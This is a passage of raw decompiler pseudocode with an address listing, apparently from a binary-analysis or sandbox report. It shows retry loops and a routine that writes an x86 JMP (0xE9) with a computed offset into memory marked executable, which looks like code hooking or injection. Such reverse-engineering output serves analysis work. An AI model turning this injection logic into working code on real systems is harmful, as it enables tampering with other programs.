									_t1538 = _v284;
									_t1035 = _v280;
									while(1) {
										asm("movq xmm0, [esp+0x200]");
										asm("movq xmm1, [esp+0x1f8]");
										asm("pxor xmm2, xmm2");
										asm("movq [esp], xmm0");
										_v680 = 5;
										_v676 = _t1035;
										 *(_t1576 + 0x10) = _t1538;
										asm("movq [esp+0x14], xmm1");
										_v660 = _v148;
										asm("movq xmm3, [0x439d48]");
										_v656 = _v144;
										asm("movq [esp+0x24], xmm2");
										asm("movq [esp+0x2c], xmm3");
										_t778 = E004304B0(_t1499, _t1538);
										__eflags = _t778;
										if(_t778 == 0) {
											break;
										}
										_t1035 = E0040D530( &_v264, _t1455);
										_t1538 = _t1455;
										_t1455 = _t1538 - 0xffffffff;
										__eflags = _t1035 - 0xffffffff | _t1455;
										if((_t1035 - 0xffffffff | _t1455) == 0) {
											E0040E230( &_v392);
											E00432530(_t1035,  &_v416, _t1455, _t1499, _t1538);
											E00429510( &_v304);
											E00429510( &_v320);
											E00429510( &_v336);
											E00429510( &_v136);
											E0040E2F0(_t1035, _t1576 + 0x1bc, _t1569);
											E00429510( &_v260);
											__eflags = 0;
											return 0;
										} else {
											_t1499 = _t1499 + 1;
											__eflags = _t1499 - 0xa;
											if(_t1499 != 0xa) {
												continue;
											} else {
												E0040E230( &_v392);
												E00432530(_t1035,  &_v416, _t1455, _t1499, _t1538);
												E00429510( &_v304);
												E00429510( &_v320);
												E00429510( &_v336);
												E00429510( &_v136);
												E0040E2F0(_t1035, _t1576 + 0x1bc, _t1569);
												E00429510( &_v260);
												__eflags = 0;
												return 0;
											}
										}
										goto L95;
									}
									_v284 = _t1538;
									_t1500 = 0;
									__eflags = 0;
									_v280 = _t1035;
									_t1539 = _v284;
									_t1036 = _v280;
									while(1) {
										_push(0x80);
										_push(_v144);
										_push(_v148);
										_push(_t1539);
										_push(_t1036);
										_t1457 =  &_v576;
										__eflags = E0040D170( &_v264, _t1457);
										if(__eflags != 0) {
											break;
										}
										_t1036 = E0040D530( &_v284, _t1457);
										_t1539 = _t1457;
										_t1477 = _t1539 - 0xffffffff;
										__eflags = _t1036 - 0xffffffff | _t1539 - 0xffffffff;
										if((_t1036 - 0xffffffff | _t1539 - 0xffffffff) == 0) {
											E0040E230( &_v412);
											E00432530(_t1036,  &_v436, _t1477, _t1500, _t1539);
											E00429510( &_v324);
											E00429510( &_v340);
											E00429510( &_v356);
											E00429510( &_v156);
											E0040E2F0(_t1036,  &_v264, _t1569);
											E00429510( &_v280);
											__eflags = 0;
											return 0;
										} else {
											_t1500 = _t1500 + 1;
											__eflags = _t1500 - 0xa;
											if(_t1500 != 0xa) {
												continue;
											} else {
												E0040E230( &_v412);
												E00432530(_t1036,  &_v436, _t1477, _t1500, _t1539);
												E00429510( &_v324);
												E00429510( &_v340);
												E00429510( &_v356);
												E00429510( &_v156);
												E0040E2F0(_t1036,  &_v264, _t1569);
												E00429510( &_v280);
												__eflags = 0;
												return 0;
											}
										}
										goto L95;
									}
									_v300 = _t1036;
									 *((intOrPtr*)(_t1576 + 0x64)) = _v620;
									asm("cdq");
									asm("movd xmm1, ebx");
									_t1038 =  &_v616;
									_t1501 =  *((intOrPtr*)(_t1038 + 0x1c8));
									_t781 =  &_v604;
									 *(_t781 + 0x12c) = _t1539;
									asm("movd xmm0, edx");
									asm("punpckldq xmm1, xmm0");
									_t1540 =  *((intOrPtr*)(_t781 - 0x14));
									 *((intOrPtr*)(_t781 - 0xc)) = 0;
									 *((intOrPtr*)(_t781 - 8)) =  *((intOrPtr*)(_t1038 + 0x1c8));
									asm("movdqu [eax-0x28], xmm1");
									asm("movq [eax], xmm1");
									_t1459 =  &_v612;
									_t782 = E00430C90(_t1540, _t1459, __eflags, _t781, 0x40, _t1038);
									__eflags = _t782;
									if(_t782 != 0) {
										E0040E230( &_v412);
										E00432530(_t1038,  &_v436, _t1459, _t1501, _t1540);
										E00429510( &_v324);
										E00429510( &_v340);
										E00429510( &_v356);
										E00429510( &_v156);
										E0040E2F0(_t1038,  &_v264, _t1569);
										E00429510( &_v280);
										__eflags = 0;
										return 0;
									} else {
										__eflags = 0;
										_v624 = _t1540;
										_v628 = 0;
										_t1040 = _v300;
										_t1503 = _v620;
										_t1542 = _v160;
										while(1) {
											L35:
											asm("movq xmm0, [esp+0x200]");
											asm("movq [esp], xmm0");
											asm("pxor xmm2, xmm2");
											_v700 = 5;
											 *(_t1576 + 0xc) = _t1040;
											asm("movq xmm1, [esp+0x1f8]");
											 *(_t1576 + 0x10) = _v304;
											asm("movq [esp+0x14], xmm1");
											_v680 = _t1542;
											_v676 = _t1503;
											asm("movq [esp+0x24], xmm2");
											asm("movdqu xmm3, [esp+0x40]");
											asm("movq [esp+0x2c], xmm3");
											_t793 = E004304B0(_t1503, _t1542);
											__eflags = _t793;
											if(_t793 == 0) {
												break;
											}
											_t1055 = 0;
											__eflags = 0;
											while(1) {
												_t911 = E0040CA10( &_v284, __eflags);
												_t1326 = _t1459;
												_t1459 = _t911 | _t1326;
												__eflags = _t1459;
												if(_t1459 != 0) {
													break;
												}
												__eflags = _t1055 - 0x20;
												if(_t1055 == 0x20) {
													_t1040 = 0xffffffff;
													_v304 = 0xffffffff;
												} else {
													E004122A0(0x5dc, _t1459);
													_t1055 = _t1055 + 1;
													continue;
												}
												L47:
												__eflags = _t1040 - 0xffffffff | _v304 - 0xffffffff;
												if((_t1040 - 0xffffffff | _v304 - 0xffffffff) == 0) {
													E0040E230( &_v412);
													E00432530(_t1040,  &_v436, 0xffffffff, _t1503, _t1542);
													E00429510( &_v324);
													E00429510( &_v340);
													E00429510( &_v356);
													E00429510( &_v156);
													E0040E2F0(_t1040,  &_v264, _t1569);
													E00429510( &_v280);
													__eflags = 0;
													return 0;
												} else {
													_t1459 = _v628 + 1;
													_v628 = _t1459;
													__eflags = _t1459 - 0xa;
													if(_t1459 != 0xa) {
														goto L35;
													} else {
														E0040E230( &_v412);
														E00432530(_t1040,  &_v436, _t1459, _t1503, _t1542);
														E00429510( &_v324);
														E00429510( &_v340);
														E00429510( &_v356);
														E00429510( &_v156);
														E0040E2F0(_t1040,  &_v264, _t1569);
														E00429510( &_v280);
														__eflags = 0;
														return 0;
													}
												}
												goto L95;
											}
											_v304 = _t1326;
											_t1040 = _t911;
											goto L47;
										}
										_v300 = _t1040;
										__eflags = 0;
										_t1041 = _v304;
										_t1543 = _v300;
										_v644 = 0;
										while(1) {
											_t795 = E00429640( &_v324, 0);
											_t1504 = _t795;
											_push(E00429650( &_v328));
											_push(_v624);
											_push(_v164);
											_push(_t1041);
											_push(_t1543);
											_t1460 = _t795;
											__eflags = E0040D170( &_v288, _t1460);
											if(__eflags != 0) {
												break;
											}
											_t1518 = 0;
											__eflags = 0;
											while(1) {
												_t1543 = E0040CA10( &_v304, __eflags);
												_t1041 = _t1460;
												__eflags = _t1543 | _t1041;
												if((_t1543 | _t1041) != 0) {
													break;
												}
												__eflags = _t1518 - 0x20;
												if(_t1518 == 0x20) {
													_t1543 = 0xffffffff;
													_t1041 = 0xffffffff;
												} else {
													E004122A0(0x5dc, _t1460);
													_t1518 = _t1518 + 1;
													continue;
												}
												break;
											}
											_t1472 = _t1041 - 0xffffffff;
											__eflags = _t1543 - 0xffffffff | _t1041 - 0xffffffff;
											if((_t1543 - 0xffffffff | _t1041 - 0xffffffff) == 0) {
												E0040E230( &_v432);
												E00432530(_t1041, _t1576 + 0x110, _t1472, _t1518, _t1543);
												E00429510( &_v344);
												E00429510(_t1576 + 0x170);
												E00429510( &_v376);
												E00429510( &_v176);
												E0040E2F0(_t1041,  &_v284, _t1569);
												E00429510( &_v300);
												__eflags = 0;
												return 0;
											} else {
												_t900 =  *((intOrPtr*)(_t1576 + 0x40)) + 1;
												 *((intOrPtr*)(_t1576 + 0x40)) = _t900;
												__eflags = _t900 - 0xa;
												if(_t900 != 0xa) {
													continue;
												} else {
													E0040E230( &_v432);
													E00432530(_t1041, _t1576 + 0x110, _t1472, _t1518, _t1543);
													E00429510( &_v344);
													E00429510(_t1576 + 0x170);
													E00429510( &_v376);
													E00429510( &_v176);
													E0040E2F0(_t1041,  &_v284, _t1569);
													E00429510( &_v300);
													__eflags = 0;
													return 0;
												}
											}
											goto L95;
										}
										_v320 = _t1543;
										_t798 =  &_v636;
										 *(_t798 + 0x138) = _t1041;
										_t1544 =  *((intOrPtr*)(_t798 - 8));
										_t1461 = _t1576 + 0x6c;
										_t799 = E00430C90( *((intOrPtr*)(_t798 - 8)), _t1576 + 0x6c, __eflags,  &_v624, _v636, _t798);
										__eflags = _t799;
										if(_t799 == 0) {
											_push(0);
											E00429350(_t1576 + 0x44);
											_v644 = 0xe9;
											E00429710( &_v668,  &_v644, 1);
											_v660 = _v192 -  *((intOrPtr*)( &_v660 + 0x154)) + 0xfffffffb;
											E00429710( &_v676,  &_v660, 4);
											_t1043 =  &_v656;
											asm("movq xmm0, [0x439d50]");
											 *((intOrPtr*)(_t1043 + 4)) = _v328;
											 *((intOrPtr*)(_t1043 + 8)) =  *((intOrPtr*)(_t1043 + 0x1bc));
											asm("movq [ebx+0xc], xmm0");
											E00430C90(_t1544, _t1576 + 0x6c, __eflags,  &_v644, 0x40, _t1043);
											__eflags = 0;
											_v676 = 0;
											_t1044 = _v356;
											_t1545 = _v352;
											while(1) {
												_t810 = E00429640( &_v668, 0);
												_push(E00429650(_t1576 + 0x40));
												_push(_v200);
												_push(_v316);
												_push(_t1044);
												_push(_t1545);
												_t1465 = _t810;
												_t812 = E0040D170( &_v312, _t1465);
												__eflags = _t812;
												if(_t812 != 0) {
													break;
												}
												_t1514 = 0;
												__eflags = 0;
												while(1) {
													_t1545 = E0040CA10( &_v328, __eflags);
													_t1044 = _t1465;
													__eflags = _t1545 | _t1044;
													if((_t1545 | _t1044) != 0) {
														break;
													}
													__eflags = _t1514 - 0x20;
													if(_t1514 == 0x20) {
														_t1545 = 0xffffffff;
														_t1044 = 0xffffffff;
													} else {
														E004122A0(0x5dc, _t1465);
														_t1514 = _t1514 + 1;
														continue;
													}
													break;
												}
												_t1470 = _t1044 - 0xffffffff;
												__eflags = _t1545 - 0xffffffff | _t1044 - 0xffffffff;
												if((_t1545 - 0xffffffff | _t1044 - 0xffffffff) == 0) {
													E00429510(_t1576 + 0x40);
													E0040E230(_t1576 + 0x128);
													E00432530(_t1044,  &_v480, _t1470, _t1514, _t1545);
													E00429510( &_v368);
													E00429510( &_v384);
													E00429510( &_v400);
													E00429510( &_v200);
													E0040E2F0(_t1044,  &_v308, _t1569);
													E00429510( &_v324);
													__eflags = 0;
													return 0;
												} else {
													_t865 = _v668 + 1;
													_v668 = _t865;
													__eflags = _t865 - 0xa;
													if(_t865 != 0xa) {
														continue;
													} else {
														E00429510(_t1576 + 0x40);
														E0040E230(_t1576 + 0x128);
														E00432530(_t1044,  &_v480, _t1470, _t1514, _t1545);
														E00429510( &_v368);
														E00429510( &_v384);
														E00429510( &_v400);
														E00429510( &_v200);
														E0040E2F0(_t1044,  &_v308, _t1569);
														E00429510( &_v324);
														__eflags = 0;
														return 0;
													}
												}
												goto L95;
											}
											_v348 = _t1044;
											_t1045 = 0;
											__eflags = 0;
											_v344 = _t1545;
											_t1466 = _v348;
											_t813 = _t1545;
											while(1) {
												asm("movq xmm0, [esp+0x200]");
												asm("movq [esp], xmm0");
												asm("pxor xmm1, xmm1");
												_v744 = 5;
												_v740 = _t813;
												_v736 = _t1466;
												_v732 = _v332;
												 *((intOrPtr*)(_t1576 + 0x18)) = _v216;
												_t1546 =  *((intOrPtr*)(_t1576 + 0x21c));
												_v724 =  *((intOrPtr*)(_t1576 + 0x21c));
												_t1507 =  *((intOrPtr*)(_t1576 + 0x220));
												 *((intOrPtr*)(_t1576 + 0x20)) =  *((intOrPtr*)(_t1576 + 0x220));
												asm("movq [esp+0x24], xmm1");
												asm("movq [esp+0x2c], xmm1");
												_t815 = E004304B0( *((intOrPtr*)(_t1576 + 0x220)),  *((intOrPtr*)(_t1576 + 0x21c)));
												__eflags = _t815;
												if(_t815 == 0) {
													break;
												}
												_t1547 = 0;
												__eflags = 0;
												while(1) {
													_t813 = E0040CA10( &_v328, __eflags);
													__eflags = _t813 | _t1466;
													if((_t813 | _t1466) != 0) {
														break;
													}
													__eflags = _t1547 - 0x20;
													if(_t1547 == 0x20) {
														_t813 = 0xffffffff;
														_t1466 = 0xffffffff;
													} else {
														E004122A0(0x5dc, _t1466);
														_t1547 = _t1547 + 1;
														continue;
													}
													break;
												}
												_t1549 = _t1466 - 0xffffffff;
												_t1510 = _t813 - 0xffffffff | _t1466 - 0xffffffff;
												__eflags = _t813 - 0xffffffff | _t1466 - 0xffffffff;
												if((_t813 - 0xffffffff | _t1466 - 0xffffffff) == 0) {
													E00429510(_t1576 + 0x40);
													E0040E230(_t1576 + 0x128);
													E00432530(_t1045,  &_v480, _t1466, _t1510, _t1549);
													E00429510( &_v368);
													E00429510( &_v384);
													E00429510( &_v400);
													E00429510( &_v200);
													E0040E2F0(_t1045,  &_v308, _t1569);
													E00429510( &_v324);
													__eflags = 0;
													return 0;
												} else {
													_t1045 = _t1045 + 1;
													__eflags = _t1045 - 0xa;
													if(_t1045 != 0xa) {
														continue;
													} else {
														E00429510(_t1576 + 0x40);
														E0040E230(_t1576 + 0x128);
														E00432530(_t1045,  &_v480, _t1466, _t1510, _t1549);
														E00429510( &_v368);
														E00429510( &_v384);
														E00429510( &_v400);
														E00429510( &_v200);
														E0040E2F0(_t1045,  &_v308, _t1569);
														E00429510( &_v324);
														__eflags = 0;
														return 0;
													}
												}
												goto L95;
											}
											_push(0);
											_t1467 = _v168;
											__eflags = _t1467;
											_t1468 =  !=  ? _t1467 + 0xc : _t1467;
											_push( !=  ? _t1467 + 0xc : _t1467);
											_t1047 = E00431A80( !=  ? _t1467 + 0xc : _t1467, _t1467,  &_v480, 0x2710);
											E00429510(_t1576 + 0x50);
											E0040E230(_t1576 + 0x138);
											E00432530(_t1047,  &_v480,  !=  ? _t1467 + 0xc : _t1467, _t1507, _t1546);
											E00429510( &_v368);
											E00429510( &_v384);
											E00429510( &_v400);
											E00429510( &_v200);
											E0040E2F0(_t1047,  &_v308, _t1569);
											E00429510( &_v324);
											__eflags = _t1047 - 1;
											_t465 = _t1047 - 1 > 0;
											__eflags = _t465;
											return 0 | _t465;
										} else {
											E0040E230( &_v432);
											E00432530( &_v624, _t1576 + 0x110, _t1461, _t1504, _t1544);
											E00429510( &_v344);
											E00429510(_t1576 + 0x170);
											E00429510( &_v376);
											E00429510( &_v176);
											E0040E2F0( &_v624,  &_v284, _t1569);
											E00429510( &_v300);
											__eflags = 0;
											return 0;
										}
									}
								}
							}
						} else {
							goto L6;
						}
					}
				} else {
					E00429510(_t1572 + 0x228);
					E0040E2F0(_t1027,  &_v180, _t1569);
					E00429510( &_v196);
					return 0;
				}
				L95:
			}

0x0040acd9
0x0040acdf
0x0040ace3
0x0040acf4
0x0040acf7
0x0040acfc
0x0040ad05
0x0040ad0c
0x0040ad13
0x0040ad1b
0x0040ad20
0x0040ad29
0x0040ad2e
0x0040ad3d
0x0040ad41
0x0040ad57
0x0040ad73
0x0040ad78
0x0040ad84
0x0040ad88
0x0040ad8b
0x0040ad93
0x0040ada9
0x0040adc5
0x0040adca
0x0040add6
0x0040adda
0x0040addd
0x0040ade5
0x0040adfb
0x0040ae17
0x0040ae1c
0x0040ae28
0x0040ae2c
0x0040ae2f
0x0040ae37
0x0040ae4d
0x0040ae69
0x0040ae6e
0x0040ae7a
0x0040ae7e
0x0040ae81
0x0040ae89
0x0040ae9f
0x0040aebb
0x0040aec0
0x0040aecc
0x0040aed0
0x0040aed3
0x0040aedb
0x0040aef1
0x0040af0d
0x0040af12
0x0040af23
0x0040af26
0x0040af34
0x0040af39
0x0040af3e
0x0040af50
0x0040af55
0x0040af5a
0x0040af6c
0x0040af71
0x0040af76
0x0040af88
0x0040af8d
0x0040af92
0x0040afa4
0x0040afa9
0x0040afae
0x0040afc0
0x0040afc5
0x0040afd1
0x0040afd6
0x0040afeb
0x0040aff0
0x0040aff9
0x0040b002
0x0040b039
0x0040b042
0x0040b05f
0x0040b072
0x0040b077
0x0040b07c
0x0040c89d
0x0040c8a0
0x0040c8a4
0x0040c8a6
0x0040c8aa
0x0040c8af
0x0040c8d5
0x0040c8e1
0x0040c8e9
0x0040c8f5
0x0040c903
0x0040c908
0x0040c90e
0x00000000
0x0040c914
0x0040c914
0x0040c920
0x0040c924
0x0040c928
0x0040c92a
0x00000000
0x0040c930
0x0040c930
0x0040c935
0x00000000
0x0040c93b
0x0040c93b
0x0040c946
0x0040c954
0x0040c967
0x0040c96c
0x0040c978
0x0040c980
0x0040c98c
0x0040c99f
0x0040c9a1
0x0040c9ab
0x0040c9b5
0x0040c9b8
0x0040c9c0
0x0040c9c2
0x0040c9c6
0x0040c9c8
0x0040c9cc
0x0040c9cc
0x0040c9ce
0x0040c9d2
0x0040c9d2
0x0040c9d3
0x0040c9d7
0x0040c9db
0x0040c9de
0x0040c9e1
0x00000000
0x00000000
0x0040c9e3
0x0040c9e7
0x0040c9ea
0x00000000
0x00000000
0x00000000
0x0040c9ea
0x0040c9ec
0x0040c9ec
0x0040c9f7
0x0040c9ff
0x0040c9ff
0x0040c935
0x0040c92a
0x0040b082
0x0040b082
0x0040b082
0x0040b08b
0x0040b08b
0x0040b097
0x0040b0a3
0x0040b0a8
0x0040b0b7
0x0040b0bb
0x0040b0d1
0x0040b0ed
0x0040b0f2
0x0040b0fe
0x0040b102
0x0040b105
0x0040b10d
0x0040b123
0x0040b13f
0x0040b144
0x0040b150
0x0040b154
0x0040b157
0x0040b15f
0x0040b175
0x0040b191
0x0040b196
0x0040b19b
0x0040b19e
0x0040b1aa
0x0040b1b9
0x0040b1be
0x0040b1c2
0x0040b1d0
0x0040b1d5
0x0040b1da
0x0040b1ec
0x0040b1f1
0x0040b1f6
0x0040b20d
0x0040b215
0x0040b21c
0x0040b223
0x0040b22c
0x0040b231
0x0040b23a
0x0040b246
0x0040b248
0x0040b24f
0x0040b262
0x0040b269
0x0040b282
0x0040b290
0x0040b2a7
0x0040b2ac
0x0040b2bb
0x0040b2c2
0x0040b2d2
0x0040b2d9
0x0040b2ee
0x0040b2f3
0x0040b2fa
0x0040b303
0x0040b30a
0x0040b319
0x0040b320
0x0040b32c
0x0040b338
0x0040b344
0x0040b350
0x0040b35c
0x0040b361
0x0040b36f
0x0040b30c
0x0040b313
0x0040b317
0x0040b37e
0x0040b383
0x0040b38b
0x0040b399
0x0040b39a
0x0040b39b
0x0040b3a4
0x0040b3ab
0x0040b3b5
0x0040b3bf
0x0040b3c9
0x0040b3d5
0x0040b3d6
0x0040b3dd
0x0040b3e1
0x0040b3e5
0x0040b3f3
0x0040b401
0x0040b402
0x0040b40a
0x0040b40e
0x0040b412
0x0040b420
0x0040b433
0x0040b434
0x0040b438
0x0040b43c
0x0040b440
0x0040b460
0x0040b46c
0x0040b476
0x0040b47c
0x0040b482
0x0040b487
0x0040b496
0x0040b49a
0x0040b4b0
0x0040b4cc
0x0040b4d1
0x0040b4dd
0x0040b4e1
0x0040b4e4
0x0040b4ec
0x0040b502
0x0040b51e
0x0040b523
0x0040b52f
0x0040b533
0x0040b536
0x0040b53e
0x0040b554
0x0040b570
0x0040b575
0x0040b581
0x0040b585
0x0040b588
0x0040b590
0x0040b5a6
0x0040b5c2
0x0040b5c7
0x0040b5d3
0x0040b5d7
0x0040b5da
0x0040b5e2
0x0040b5f8
0x0040b614
0x0040b619
0x0040b625
0x0040b629
0x0040b62c
0x0040b634
0x0040b64a
0x0040b666
0x0040b66b
0x0040b677
0x0040b67b
0x0040b67e
0x0040b686
0x0040b69c
0x0040b6b8
0x0040b6bd
0x0040b6c9
0x0040b6cd
0x0040b6d0
0x0040b6d8
0x0040b6ee
0x0040b70a
0x0040b70f
0x0040b714
0x0040b720
0x0040b723
0x0040b731
0x0040b736
0x0040b73b
0x0040b74a
0x0040b74f
0x0040b754
0x0040b763
0x0040b768
0x0040b76d
0x0040b77f
0x0040b784
0x0040b789
0x0040b79b
0x0040b7a0
0x0040b7a5
0x0040b7b7
0x0040b7bc
0x0040b7c1
0x0040b7d3
0x0040b7d8
0x0040b7dd
0x0040b7ef
0x0040b7f4
0x0040b800
0x0040b808
0x0040b80d
0x0040b814
0x0040b824
0x0040b826
0x0040b828
0x0040c829
0x0040c835
0x0040c841
0x0040c84d
0x0040c859
0x0040c865
0x0040c871
0x0040c87d
0x0040c882
0x0040c890
0x0040b82e
0x0040b835
0x0040b835
0x0040b83c
0x0040ba4c
0x0040ba50
0x0040ba50
0x0040ba52
0x0040ba56
0x0040ba56
0x0040ba5f
0x0040ba71
0x0040ba85
0x0040ba93
0x0040baa6
0x0040bab2
0x0040babe
0x0040bac3
0x0040bad1
0x0040bad7
0x0040badc
0x0040bade
0x0040bb91
0x0040bb91
0x0040bb9a
0x0040bb9f
0x0040bba3
0x0040bbb2
0x0040bbbd
0x0040bbc6
0x0040bbca
0x0040bbd0
0x0040bbd7
0x0040bbdb
0x0040bbe2
0x0040bbe6
0x0040bbec
0x0040bbf2
0x0040bbf7
0x0040bbf9
0x0040bc7d
0x0040bc89
0x0040bc9d
0x0040bca4
0x0040bcb0
0x0040bcb7
0x0040c815
0x0040c819
0x00000000
0x0040bcbd
0x0040bcc4
0x0040bcc9
0x0040bcd0
0x0040bce0
0x0040bce2
0x0040bce4
0x0040c7ab
0x0040c7b7
0x0040c7c3
0x0040c7cf
0x0040c7db
0x0040c7e7
0x0040c7f3
0x0040c7ff
0x0040c804
0x0040c812
0x00000000
0x00000000
0x00000000
0x0040bce4
0x00000000
0x00000000
0x00000000
0x0040bae4
0x0040bae4
0x0040bae6
0x0040baea
0x0040baec
0x0040baee
0x0040baf6
0x0040bafb
0x0040bb04
0x0040bb09
0x0040bb18
0x0040bb23
0x0040bb2c
0x0040bb30
0x0040bb33
0x0040bb39
0x0040bb41
0x0040bb45
0x0040bb49
0x0040bb4d
0x0040bb55
0x0040bb5b
0x0040bb60
0x0040bb62
0x00000000
0x00000000
0x0040bb6d
0x0040bb72
0x0040bb7c
0x0040bb7f
0x0040bb80
0x0040bb85
0x0040bb87
0x00000000
0x0040bb8d
0x0040bb8d
0x00000000
0x0040bb8d
0x00000000
0x0040bb87
0x0040bbfb
0x0040bc02
0x0040bc0e
0x0040bc1a
0x0040bc26
0x0040bc32
0x0040bc3e
0x0040bc4a
0x0040bc56
0x0040bc62
0x0040bc67
0x0040bc75
0x0040bc75
0x00000000
0x0040bcea
0x0040bcea
0x0040bceb
0x0040bceb
0x0040bcfb
0x0040bd07
0x0040bd13
0x0040bd1f
0x0040bd2b
0x0040bd37
0x0040bd43
0x0040bd4f
0x0040bd54
0x0040bd62
0x0040b842
0x0040b842
0x0040b842
0x0040b846
0x0040b846
0x0040b848
0x0040b84c
0x0040b853
0x0040b85a
0x0040b85a
0x0040b863
0x0040b86c
0x0040b870
0x0040b875
0x0040b87d
0x0040b881
0x0040b885
0x0040b892
0x0040b89d
0x0040b8a5
0x0040b8a9
0x0040b8af
0x0040b8b5
0x0040b8ba
0x0040b8bc
0x00000000
0x00000000
0x0040b8ce
0x0040b8d0
0x0040b8dd
0x0040b8df
0x0040b8e1
0x0040bd6c
0x0040bd78
0x0040bd84
0x0040bd90
0x0040bd9c
0x0040bda8
0x0040bdb4
0x0040bdc0
0x0040bdc5
0x0040bdd3
0x0040b8e7
0x0040b8e7
0x0040b8e8
0x0040b8eb
0x00000000
0x0040b8f1
0x0040b8f8
0x0040b904
0x0040b910
0x0040b91c
0x0040b928
0x0040b934
0x0040b940
0x0040b94c
0x0040b951
0x0040b95f
0x0040b95f
0x0040b8eb
0x00000000
0x0040b8e1
0x0040b962
0x0040b969
0x0040b969
0x0040b96b
0x0040b972
0x0040b979
0x0040b980
0x0040b980
0x0040b985
0x0040b98c
0x0040b993
0x0040b994
0x0040b99c
0x0040b9a8
0x0040b9aa
0x00000000
0x00000000
0x0040b9bc
0x0040b9be
0x0040b9cb
0x0040b9cd
0x0040b9cf
0x0040bddd
0x0040bde9
0x0040bdf5
0x0040be01
0x0040be0d
0x0040be19
0x0040be25
0x0040be31
0x0040be36
0x0040be44
0x0040b9d5
0x0040b9d5
0x0040b9d6
0x0040b9d9
0x00000000
0x0040b9db
0x0040b9e2
0x0040b9ee
0x0040b9fa
0x0040ba06
0x0040ba12
0x0040ba1e
0x0040ba2a
0x0040ba36
0x0040ba3b
0x0040ba49
0x0040ba49
0x0040b9d9
0x00000000
0x0040b9cf
0x0040be47
0x0040be58
0x0040be5c
0x0040be5d
0x0040be61
0x0040be65
0x0040be6b
0x0040be6f
0x0040be75
0x0040be79
0x0040be7d
0x0040be82
0x0040be89
0x0040be8c
0x0040be91
0x0040be99
0x0040be9d
0x0040bea2
0x0040bea4
0x0040c73a
0x0040c746
0x0040c752
0x0040c75e
0x0040c76a
0x0040c776
0x0040c782
0x0040c78e
0x0040c793
0x0040c7a1
0x0040beaa
0x0040beaa
0x0040beac
0x0040beb0
0x0040beb4
0x0040bebb
0x0040bebf
0x0040bec6
0x0040bec6
0x0040bec6
0x0040becf
0x0040bed4
0x0040bed8
0x0040bee0
0x0040beeb
0x0040bef4
0x0040bef8
0x0040befe
0x0040bf02
0x0040bf06
0x0040bf0c
0x0040bf12
0x0040bf18
0x0040bf1d
0x0040bf1f
0x00000000
0x00000000
0x0040bf21
0x0040bf21
0x0040bf23
0x0040bf2a
0x0040bf2f
0x0040bf33
0x0040bf33
0x0040bf35
0x00000000
0x00000000
0x0040bf3b
0x0040bf3e
0x0040bfde
0x0040bfe3
0x0040bf44
0x0040bf49
0x0040bf4e
0x00000000
0x0040bf4e
0x0040bfea
0x0040bffc
0x0040bffe
0x0040c08e
0x0040c09a
0x0040c0a6
0x0040c0b2
0x0040c0be
0x0040c0ca
0x0040c0d6
0x0040c0e2
0x0040c0e7
0x0040c0f5
0x0040c004
0x0040c008
0x0040c009
0x0040c00d
0x0040c010
0x00000000
0x0040c016
0x0040c01d
0x0040c029
0x0040c035
0x0040c041
0x0040c04d
0x0040c059
0x0040c065
0x0040c071
0x0040c076
0x0040c084
0x0040c084
0x0040c010
0x00000000
0x0040bffe
0x0040c0f8
0x0040c0ff
0x00000000
0x0040c0ff
0x0040bf51
0x0040bf58
0x0040bf5a
0x0040bf61
0x0040bf68
0x0040bf6c
0x0040bf75
0x0040bf7a
0x0040bf88
0x0040bf89
0x0040bf8d
0x0040bf94
0x0040bf95
0x0040bf96
0x0040bfa4
0x0040bfa6
0x00000000
0x00000000
0x0040bfac
0x0040bfac
0x0040bfae
0x0040bfba
0x0040bfbc
0x0040bfc0
0x0040bfc2
0x00000000
0x00000000
0x0040bfc8
0x0040bfcb
0x0040c106
0x0040c10b
0x0040bfd1
0x0040bfd6
0x0040bfdb
0x00000000
0x0040bfdb
0x00000000
0x0040bfcb
0x0040c118
0x0040c11a
0x0040c11c
0x0040c1ac
0x0040c1b8
0x0040c1c4
0x0040c1d0
0x0040c1dc
0x0040c1e8
0x0040c1f4
0x0040c200
0x0040c205
0x0040c213
0x0040c122
0x0040c126
0x0040c127
0x0040c12b
0x0040c12e
0x00000000
0x0040c134
0x0040c13b
0x0040c147
0x0040c153
0x0040c15f
0x0040c16b
0x0040c177
0x0040c183
0x0040c18f
0x0040c194
0x0040c1a2
0x0040c1a2
0x0040c12e
0x00000000
0x0040c11c
0x0040c216
0x0040c21d
0x0040c221
0x0040c227
0x0040c236
0x0040c23a
0x0040c23f
0x0040c241
0x0040c2b4
0x0040c2ba
0x0040c2bf
0x0040c2cf
0x0040c2e8
0x0040c2f1
0x0040c2fd
0x0040c309
0x0040c311
0x0040c314
0x0040c317
0x0040c328
0x0040c32d
0x0040c32f
0x0040c333
0x0040c33a
0x0040c341
0x0040c347
0x0040c357
0x0040c358
0x0040c35f
0x0040c366
0x0040c367
0x0040c368
0x0040c371
0x0040c376
0x0040c378
0x00000000
0x00000000
0x0040c37e
0x0040c37e
0x0040c380
0x0040c38c
0x0040c38e
0x0040c392
0x0040c394
0x00000000
0x00000000
0x0040c396
0x0040c399
0x0040c3a8
0x0040c3ad
0x0040c39b
0x0040c3a0
0x0040c3a5
0x00000000
0x0040c3a5
0x00000000
0x0040c399
0x0040c3ba
0x0040c3bc
0x0040c3be
0x0040c454
0x0040c460
0x0040c46c
0x0040c478
0x0040c484
0x0040c490
0x0040c49c
0x0040c4a8
0x0040c4b4
0x0040c4b9
0x0040c4c7
0x0040c3c4
0x0040c3c8
0x0040c3c9
0x0040c3cd
0x0040c3d0
0x00000000
0x0040c3d6
0x0040c3da
0x0040c3e6
0x0040c3f2
0x0040c3fe
0x0040c40a
0x0040c416
0x0040c422
0x0040c42e
0x0040c43a
0x0040c43f
0x0040c44d
0x0040c44d
0x0040c3d0
0x00000000
0x0040c3be
0x0040c4ca
0x0040c4d1
0x0040c4d1
0x0040c4d3
0x0040c4da
0x0040c4e1
0x0040c4e3
0x0040c4e3
0x0040c4ec
0x0040c4f1
0x0040c4f5
0x0040c4fd
0x0040c501
0x0040c50c
0x0040c517
0x0040c51b
0x0040c522
0x0040c526
0x0040c52d
0x0040c531
0x0040c537
0x0040c53d
0x0040c542
0x0040c544
0x00000000
0x00000000
0x0040c5f3
0x0040c5f3
0x0040c5f5
0x0040c5fc
0x0040c603
0x0040c605
0x00000000
0x00000000
0x0040c607
0x0040c60a
0x0040c619
0x0040c61e
0x0040c60c
0x0040c611
0x0040c616
0x00000000
0x0040c616
0x00000000
0x0040c60a
0x0040c62b
0x0040c62d
0x0040c62d
0x0040c62f
0x0040c6bd
0x0040c6c9
0x0040c6d5
0x0040c6e1
0x0040c6ed
0x0040c6f9
0x0040c705
0x0040c711
